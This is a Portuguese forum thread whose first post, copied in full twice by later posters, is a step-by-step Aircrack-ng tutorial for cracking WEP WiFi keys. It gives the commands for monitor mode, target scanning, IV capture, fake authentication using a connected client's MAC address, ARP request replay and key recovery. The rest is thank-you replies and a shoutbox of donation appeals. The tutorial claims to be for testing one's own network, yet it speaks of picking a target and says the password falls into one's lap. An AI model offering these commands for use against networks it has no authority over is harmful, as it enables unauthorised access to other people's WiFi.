* Cantinho Satkeys

Refresh History
  • JPratas: dgtgtr Pessoal  101041 Vamos Todos Ajudar na Manutenção do Forum, Basta 1 Euro a Cada Um  43e5r6
    03 de Julho de 2025, 19:02
  • cereal killa: Todos os anos e preciso sempre a pedir esmolas e um simples gesto de nem que seja 1€ que fosse dividido por alguns ajudava, uma coisa e certa mesmo continuando isto vai levar volta a como se tem acesso aos tópicos, nunca se quis implementar esta ideia mas quem não contribuir e basta 1 € por ano não terá acesso a sacar nada, vamos ver desenrolar disto mais ate dia 7,finalmente um agradecimento em nome do satkeys a quem já fez a sua doação, obrigada
    03 de Julho de 2025, 15:07
  • m1957: Por favor! Uma pequena ajuda, não deixem que o fórum ecerre. Obrigado!
    03 de Julho de 2025, 01:10
  • j.s.: [link]
    02 de Julho de 2025, 21:09
  • j.s.: h7t45 ao membro anónimo pela sua ajuda  49E09B4F
    02 de Julho de 2025, 21:09
  • j.s.: dgtgtr a todos  4tj97u<z
    01 de Julho de 2025, 17:18
  • FELISCUNHA: Votos de um santo domingo para todo o auditório  4tj97u<z
    29 de Junho de 2025, 11:59
  • m1957: Foi de boa vontade!
    28 de Junho de 2025, 00:39
  • j.s.: passem f.v. por aqui [link]    h7t45
    27 de Junho de 2025, 17:20
  • j.s.: renovamos o nosso pedido para uma pequena ajuda para pagemento  do nosso forum
    27 de Junho de 2025, 17:19
  • j.s.: h7t45 aos convidados de honra Felizcunha e M1957 pela ajuda
    27 de Junho de 2025, 17:15
  • j.s.: dgtgtr a todos  4tj97u<z
    27 de Junho de 2025, 17:13
  • FELISCUNHA: ghyt74  pessoal  4tj97u<z
    27 de Junho de 2025, 11:51
  • JPratas: try65hytr A Todos  classic k7y8j0
    27 de Junho de 2025, 04:35
  • m1957: Por favor vaamos todos dar uma pequena ajuda, para não deixar encerrar o fórum! Obrigado.
    26 de Junho de 2025, 23:45
  • FELISCUNHA: j.s. enviei PM  101041
    26 de Junho de 2025, 21:33
  • FELISCUNHA: try65hytr  pessoal   htg6454y
    26 de Junho de 2025, 21:33
  • JPratas: try65hytr Pessoal  4tj97u<z
    26 de Junho de 2025, 02:28
  • cereal killa: Boa Tarde Pessoal E com enorme tristeza que depois de 15 anos que idealizei e abri este fórum vejo que esta na iminência de fechar portas porque ninguém tenta ajudar o pagamento do servidor, mas cada ano e sempre difícil arranjar almas caridosas que nos bom ajudando mas este ano esta complicado, mas infelizmente e como diz o j.s dia 5/07 se não houver algumas ajudas esta vez vai mesmo fechar…..e pena e triste mas tudo na vida tem fim. obrigada cereal killa
    25 de Junho de 2025, 19:40
  • j.s.: [link]
    23 de Junho de 2025, 15:58

Autor Tópico: Aircrack-ng 1.2 - Quebrar e capturar senhas WiFi  (Lida 3494 vezes)

0 Membros e 1 Visitante estão a ver este tópico.

hermannvinole

  • Visitante
Aircrack-ng 1.2 - Quebrar e capturar senhas WiFi
« em: 25 de Outubro de 2013, 15:11 »

AIRCRACK-NG 1.2

Aircrack-ng é um programa para quebrar chaves WEP e WPA/WPA2-PSK do IEEE 802.11.
Aircrack-ng pode recuperar a chave WEP, uma vez que um número suficiente de pacotes criptografados sejam capturados com o airodump-ng. Esta parte do pacote Aircrack-ng determina a chave WEP usando dois métodos fundamentais. O primeiro método é por abordagem PTW (Pyshkin, Tews, Weinmann). A principal vantagem da abordagem PTW é que pouquíssimos pacotes de dados são necessários para quebrar a chave WEP. O segundo método é o método FMS/KoreK. O método FMS/KoreK incorpora vários ataques estatísticos para descobrir a chave WEP e usa esses ataques em combinação com força-bruta.
Adicionalmente, o programa oferece um método de dicionário para determinar a chave WEP. Para quebrar chaves pré-compartilhadas WPA/WPA2, somente o método de dicionário é utilizado.

A quantas anda a segurança na sua rede de internet sem fio? Qual a dificuldade que os piratas da vizinhança teriam para descobrir a senha ou sabotar o sistema? Há espiões nas conversas ou interceptando dados durante a transmissão?
Se alguma dessas perguntas passar pela cabeça, encontre respostas com o Aircrack-ng. O Aircrack-ng é grátis e capaz de descodificar senhas feitas a partir de codificação WEP e WPA-PSK.

Piratas sem fio

Você usa o Aircrack-ng para fazer um ataque à sua própria rede. Só assim você vai saber quanto tempo seria necessário para descobrir a senha. A solução estaria em ampliar a proteção da chave WPA como limitar o acesso por MAC e desativar o serviço DHCP.
O uso do Aircrack-ng vai te ajudar a simular uma situação de perigo real. Este programa é um dos mais eficientes para interceptar e registrar o tráfego de dados em redes de computadores. Se passar no teste do Aircrack-ng, a sua rede está com bons índices de segurança.

Só visivel para registados e com resposta ao tópico.

Only visible to registered and with a reply to the topic.

 
TUTORIAL


VAMOS LÁ:

    Primeiramente iremos colocar a interface de rede em modo PROMISCUO (monitor), O comando a ser usado é:

airmon-ng start wlan0 ? “aqui é importante verificar qual a sua interface de rede”
Após executar esse comando será criada uma interface de rede com a nomenclatura “mon0”, essa interface será responsável por capturar todos os pacotes que precisamos para descriptografar a senha wep ou wpa.
Obs: Você não poderá estar conectado em nenhuma rede sem fio nesse momento.

    Agora iremos escanear todas as redes disponíveis;

Com o comando a seguir iremos ver todas os dispositivos de rede sem fio ao alcance da nossa interface de rede. É possível também ver os mac-address que estão conectados a um determinado dispositivo, assim, é preciso anotar os seguintes dado sobre o nosso alvo: BSSID, CANAL, CIPHER AUTH e ESSID. É preciso também anotar um mac-address que esteja conectado ao alvo escolhido.
airodump-ng mon0
com esse comando teremos a seguinte tela:


    Nesse passo iremos capturar os vetores de inicialização:

Obs: No comando a serguir iremos capturar pacotes IVS que trafegam na rede. O nome do arquivo a ser gerado é você quem define, e o canal é o canal do alvo que você definiu.


airdump-ng – -ivs -w capturar-ivs-redesegura -c 6 mon0

    -i = Capturar apenas pacotes que contenham Ivs (–ivs);
    -w = Prefixo do arquivo que será gerado com os dados capturados;
    -c = Canal;
    mon0 = interface de rede em modo promiscuo.


    Agora iremos enviar um pedido de falsa autenticação com um mac associado ao acces point que queremos quebrar a senha:

aireplay-ng -1 0 -e rede-segura -a 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0

    -1 = Essa opção enviao ao nosso alvo uma autenticação falsa;
    0 = Aqui temos o tempo para reassociação, em segundos
    -e = ESSID do alvo, ou seja, o nome do access point
    -a = Mac-Address do Access Point alvo
    -h = Mac-Address de alguém que esteja conectado (associado) ao access Point
    mon0 = interface de rede em modo promiscuo.


Feito isso é só aguardar que os vetores sejam capturados, porem para acelerar esse processo de captura de IVS, podemos tentar enviar um Arp request para a rede, na tentativa que alguma maquina receba e comece a enviar arp replay para nós. Isso fará com que o tráfego de dados aumente rapidamente:

    Enviando Arp request para a rede:

aireplay-ng -3 -b 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0

    -3 = Opção para arp request;
    -b = Mac-Address do Access Point alvo
    -h = Mac-Address associado ao access Point, no nosso caso o mac que identificamos como conectado ao AP rede-segura
    mon0 = interface de rede em modo promiscuo.


Obs: Pode acontecer de não conectar, você deve insistir algumas vezes ou várias.


    Após alguns minutos de captura de pacotes (lembrar que só é possível capturar pacotes se tivermos pessoas trafego de dados na rede) iremos analisar o arquivos gerado e tentar extrair a senha do Dispositivo.

aircrack-ng -a 1 capturar-ivs-redesegura

    -a = Modo para forçar o ataque
    -1 = wep (se fosse WPA usaríamos o -2)


    Aqui iremos selecionar a nossa rede alvo, pois os dados foram capturados por canal, assim todos as redes que estão no canal “6” entram no aquivo.

Feito isso a senha cai no nosso colo, veja a tela abaixo:


Só visivel para registados e com resposta ao tópico.

Only visible to registered and with a reply to the topic.
« Última modificação: 26 de Outubro de 2013, 18:47 por hermannvinole »

Rui Teixeira

  • Visitante
Re: Aircrack-ng 1.2 - Quebrar e capturar senhas WiFi
« Responder #1 em: 29 de Dezembro de 2013, 14:12 »
O meu obrigado pela partilha bve567o+

Offline paulo15

  • Membro Satkeys
  • *
  • Mensagens: 671
  • Karma: +0/-0
Re: Aircrack-ng 1.2 - Quebrar e capturar senhas WiFi
« Responder #2 em: 26 de Janeiro de 2014, 20:43 »
obrigado pela dica

Offline tamara

  • Membro Satkeys
  • *
  • Mensagens: 2424
  • Karma: +0/-0
  • Sexo: Masculino
Re: Aircrack-ng 1.2 - Quebrar e capturar senhas WiFi
« Responder #3 em: 26 de Janeiro de 2014, 21:01 »
vamos ver se e verdade obrigado

machado1234

  • Visitante
Re: Aircrack-ng 1.2 - Quebrar e capturar senhas WiFi
« Responder #4 em: 21 de Setembro de 2014, 10:39 »

AIRCRACK-NG 1.2

Aircrack-ng é um programa para quebrar chaves WEP e WPA/WPA2-PSK do IEEE 802.11.
Aircrack-ng pode recuperar a chave WEP, uma vez que um número suficiente de pacotes criptografados sejam capturados com o airodump-ng. Esta parte do pacote Aircrack-ng determina a chave WEP usando dois métodos fundamentais. O primeiro método é por abordagem PTW (Pyshkin, Tews, Weinmann). A principal vantagem da abordagem PTW é que pouquíssimos pacotes de dados são necessários para quebrar a chave WEP. O segundo método é o método FMS/KoreK. O método FMS/KoreK incorpora vários ataques estatísticos para descobrir a chave WEP e usa esses ataques em combinação com força-bruta.
Adicionalmente, o programa oferece um método de dicionário para determinar a chave WEP. Para quebrar chaves pré-compartilhadas WPA/WPA2, somente o método de dicionário é utilizado.

A quantas anda a segurança na sua rede de internet sem fio? Qual a dificuldade que os piratas da vizinhança teriam para descobrir a senha ou sabotar o sistema? Há espiões nas conversas ou interceptando dados durante a transmissão?
Se alguma dessas perguntas passar pela cabeça, encontre respostas com o Aircrack-ng. O Aircrack-ng é grátis e capaz de descodificar senhas feitas a partir de codificação WEP e WPA-PSK.

Piratas sem fio

Você usa o Aircrack-ng para fazer um ataque à sua própria rede. Só assim você vai saber quanto tempo seria necessário para descobrir a senha. A solução estaria em ampliar a proteção da chave WPA como limitar o acesso por MAC e desativar o serviço DHCP.
O uso do Aircrack-ng vai te ajudar a simular uma situação de perigo real. Este programa é um dos mais eficientes para interceptar e registrar o tráfego de dados em redes de computadores. Se passar no teste do Aircrack-ng, a sua rede está com bons índices de segurança.



 
TUTORIAL


VAMOS LÁ:

    Primeiramente iremos colocar a interface de rede em modo PROMISCUO (monitor), O comando a ser usado é:

airmon-ng start wlan0 ? “aqui é importante verificar qual a sua interface de rede”
Após executar esse comando será criada uma interface de rede com a nomenclatura “mon0”, essa interface será responsável por capturar todos os pacotes que precisamos para descriptografar a senha wep ou wpa.
Obs: Você não poderá estar conectado em nenhuma rede sem fio nesse momento.

    Agora iremos escanear todas as redes disponíveis;

Com o comando a seguir iremos ver todas os dispositivos de rede sem fio ao alcance da nossa interface de rede. É possível também ver os mac-address que estão conectados a um determinado dispositivo, assim, é preciso anotar os seguintes dado sobre o nosso alvo: BSSID, CANAL, CIPHER AUTH e ESSID. É preciso também anotar um mac-address que esteja conectado ao alvo escolhido.
airodump-ng mon0
com esse comando teremos a seguinte tela:


    Nesse passo iremos capturar os vetores de inicialização:

Obs: No comando a serguir iremos capturar pacotes IVS que trafegam na rede. O nome do arquivo a ser gerado é você quem define, e o canal é o canal do alvo que você definiu.


airdump-ng – -ivs -w capturar-ivs-redesegura -c 6 mon0

    -i = Capturar apenas pacotes que contenham Ivs (–ivs);
    -w = Prefixo do arquivo que será gerado com os dados capturados;
    -c = Canal;
    mon0 = interface de rede em modo promiscuo.


    Agora iremos enviar um pedido de falsa autenticação com um mac associado ao acces point que queremos quebrar a senha:

aireplay-ng -1 0 -e rede-segura -a 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0

    -1 = Essa opção enviao ao nosso alvo uma autenticação falsa;
    0 = Aqui temos o tempo para reassociação, em segundos
    -e = ESSID do alvo, ou seja, o nome do access point
    -a = Mac-Address do Access Point alvo
    -h = Mac-Address de alguém que esteja conectado (associado) ao access Point
    mon0 = interface de rede em modo promiscuo.


Feito isso é só aguardar que os vetores sejam capturados, porem para acelerar esse processo de captura de IVS, podemos tentar enviar um Arp request para a rede, na tentativa que alguma maquina receba e comece a enviar arp replay para nós. Isso fará com que o tráfego de dados aumente rapidamente:

    Enviando Arp request para a rede:

aireplay-ng -3 -b 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0

    -3 = Opção para arp request;
    -b = Mac-Address do Access Point alvo
    -h = Mac-Address associado ao access Point, no nosso caso o mac que identificamos como conectado ao AP rede-segura
    mon0 = interface de rede em modo promiscuo.


Obs: Pode acontecer de não conectar, você deve insistir algumas vezes ou várias.


    Após alguns minutos de captura de pacotes (lembrar que só é possível capturar pacotes se tivermos pessoas trafego de dados na rede) iremos analisar o arquivos gerado e tentar extrair a senha do Dispositivo.

aircrack-ng -a 1 capturar-ivs-redesegura

    -a = Modo para forçar o ataque
    -1 = wep (se fosse WPA usaríamos o -2)


    Aqui iremos selecionar a nossa rede alvo, pois os dados foram capturados por canal, assim todos as redes que estão no canal “6” entram no aquivo.

Feito isso a senha cai no nosso colo, veja a tela abaixo:



ja nao sei o que dizer ca vai mais este para hoje

nakdbar

  • Visitante
Re: Aircrack-ng 1.2 - Quebrar e capturar senhas WiFi
« Responder #5 em: 15 de Outubro de 2014, 19:12 »
MUITO BOM  6ty5

vivastar

  • Visitante
Re: Aircrack-ng 1.2 - Quebrar e capturar senhas WiFi
« Responder #6 em: 09 de Dezembro de 2014, 17:14 »
Espetacular.
 h7t45

Online roquinha

  • Membro Satkeys
  • *
  • Mensagens: 160
  • Karma: +0/-0
  • Sexo: Masculino
Re: Aircrack-ng 1.2 - Quebrar e capturar senhas WiFi
« Responder #7 em: 23 de Fevereiro de 2015, 00:18 »
 h7t45qq

Offline bin ladem

  • Membro Satkeys
  • *
  • Mensagens: 199
  • Karma: +0/-0
Re: Aircrack-ng 1.2 - Quebrar e capturar senhas WiFi
« Responder #8 em: 28 de Fevereiro de 2015, 22:35 »
 y5r6t muito  h7t45

pinheiro 58

  • Visitante
Re: Aircrack-ng 1.2 - Quebrar e capturar senhas WiFi
« Responder #9 em: 24 de Abril de 2016, 12:12 »
vou ver se ainda funciona

Offline JCM1234

  • Membro Satkeys
  • *
  • Mensagens: 113
  • Karma: +0/-0
Re: Aircrack-ng 1.2 - Quebrar e capturar senhas WiFi
« Responder #10 em: 25 de Abril de 2016, 09:53 »

AIRCRACK-NG 1.2
CA CA VA VA FICHE ESTE JA ERA SEM TEMPO
Aircrack-ng é um programa para quebrar chaves WEP e WPA/WPA2-PSK do IEEE 802.11.
Aircrack-ng pode recuperar a chave WEP, uma vez que um número suficiente de pacotes criptografados sejam capturados com o airodump-ng. Esta parte do pacote Aircrack-ng determina a chave WEP usando dois métodos fundamentais. O primeiro método é por abordagem PTW (Pyshkin, Tews, Weinmann). A principal vantagem da abordagem PTW é que pouquíssimos pacotes de dados são necessários para quebrar a chave WEP. O segundo método é o método FMS/KoreK. O método FMS/KoreK incorpora vários ataques estatísticos para descobrir a chave WEP e usa esses ataques em combinação com força-bruta.
Adicionalmente, o programa oferece um método de dicionário para determinar a chave WEP. Para quebrar chaves pré-compartilhadas WPA/WPA2, somente o método de dicionário é utilizado.

A quantas anda a segurança na sua rede de internet sem fio? Qual a dificuldade que os piratas da vizinhança teriam para descobrir a senha ou sabotar o sistema? Há espiões nas conversas ou interceptando dados durante a transmissão?
Se alguma dessas perguntas passar pela cabeça, encontre respostas com o Aircrack-ng. O Aircrack-ng é grátis e capaz de descodificar senhas feitas a partir de codificação WEP e WPA-PSK.

Piratas sem fio

Você usa o Aircrack-ng para fazer um ataque à sua própria rede. Só assim você vai saber quanto tempo seria necessário para descobrir a senha. A solução estaria em ampliar a proteção da chave WPA como limitar o acesso por MAC e desativar o serviço DHCP.
O uso do Aircrack-ng vai te ajudar a simular uma situação de perigo real. Este programa é um dos mais eficientes para interceptar e registrar o tráfego de dados em redes de computadores. Se passar no teste do Aircrack-ng, a sua rede está com bons índices de segurança.



 
TUTORIAL


VAMOS LÁ:

    Primeiramente iremos colocar a interface de rede em modo PROMISCUO (monitor), O comando a ser usado é:

airmon-ng start wlan0 ? “aqui é importante verificar qual a sua interface de rede”
Após executar esse comando será criada uma interface de rede com a nomenclatura “mon0”, essa interface será responsável por capturar todos os pacotes que precisamos para descriptografar a senha wep ou wpa.
Obs: Você não poderá estar conectado em nenhuma rede sem fio nesse momento.

    Agora iremos escanear todas as redes disponíveis;

Com o comando a seguir iremos ver todas os dispositivos de rede sem fio ao alcance da nossa interface de rede. É possível também ver os mac-address que estão conectados a um determinado dispositivo, assim, é preciso anotar os seguintes dado sobre o nosso alvo: BSSID, CANAL, CIPHER AUTH e ESSID. É preciso também anotar um mac-address que esteja conectado ao alvo escolhido.
airodump-ng mon0
com esse comando teremos a seguinte tela:


    Nesse passo iremos capturar os vetores de inicialização:

Obs: No comando a serguir iremos capturar pacotes IVS que trafegam na rede. O nome do arquivo a ser gerado é você quem define, e o canal é o canal do alvo que você definiu.


airdump-ng – -ivs -w capturar-ivs-redesegura -c 6 mon0

    -i = Capturar apenas pacotes que contenham Ivs (–ivs);
    -w = Prefixo do arquivo que será gerado com os dados capturados;
    -c = Canal;
    mon0 = interface de rede em modo promiscuo.


    Agora iremos enviar um pedido de falsa autenticação com um mac associado ao acces point que queremos quebrar a senha:

aireplay-ng -1 0 -e rede-segura -a 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0

    -1 = Essa opção enviao ao nosso alvo uma autenticação falsa;
    0 = Aqui temos o tempo para reassociação, em segundos
    -e = ESSID do alvo, ou seja, o nome do access point
    -a = Mac-Address do Access Point alvo
    -h = Mac-Address de alguém que esteja conectado (associado) ao access Point
    mon0 = interface de rede em modo promiscuo.


Feito isso é só aguardar que os vetores sejam capturados, porem para acelerar esse processo de captura de IVS, podemos tentar enviar um Arp request para a rede, na tentativa que alguma maquina receba e comece a enviar arp replay para nós. Isso fará com que o tráfego de dados aumente rapidamente:

    Enviando Arp request para a rede:

aireplay-ng -3 -b 00:13:46:18:c9:58 -h 00:1f:3b:92:d1:df mon0

    -3 = Opção para arp request;
    -b = Mac-Address do Access Point alvo
    -h = Mac-Address associado ao access Point, no nosso caso o mac que identificamos como conectado ao AP rede-segura
    mon0 = interface de rede em modo promiscuo.


Obs: Pode acontecer de não conectar, você deve insistir algumas vezes ou várias.


    Após alguns minutos de captura de pacotes (lembrar que só é possível capturar pacotes se tivermos pessoas trafego de dados na rede) iremos analisar o arquivos gerado e tentar extrair a senha do Dispositivo.

aircrack-ng -a 1 capturar-ivs-redesegura

    -a = Modo para forçar o ataque
    -1 = wep (se fosse WPA usaríamos o -2)


    Aqui iremos selecionar a nossa rede alvo, pois os dados foram capturados por canal, assim todos as redes que estão no canal “6” entram no aquivo.

Feito isso a senha cai no nosso colo, veja a tela abaixo:




Offline hugo edr

  • Membro Satkeys
  • *
  • Mensagens: 37
  • Karma: +0/-0
Re: Aircrack-ng 1.2 - Quebrar e capturar senhas WiFi
« Responder #11 em: 22 de Janeiro de 2017, 09:40 »
 try65hytr

Offline pedretinho9111

  • Membro Satkeys
  • *
  • Mensagens: 834
  • Karma: +0/-0
Re: Aircrack-ng 1.2 - Quebrar e capturar senhas WiFi
« Responder #12 em: 12 de Fevereiro de 2017, 10:16 »
obrigado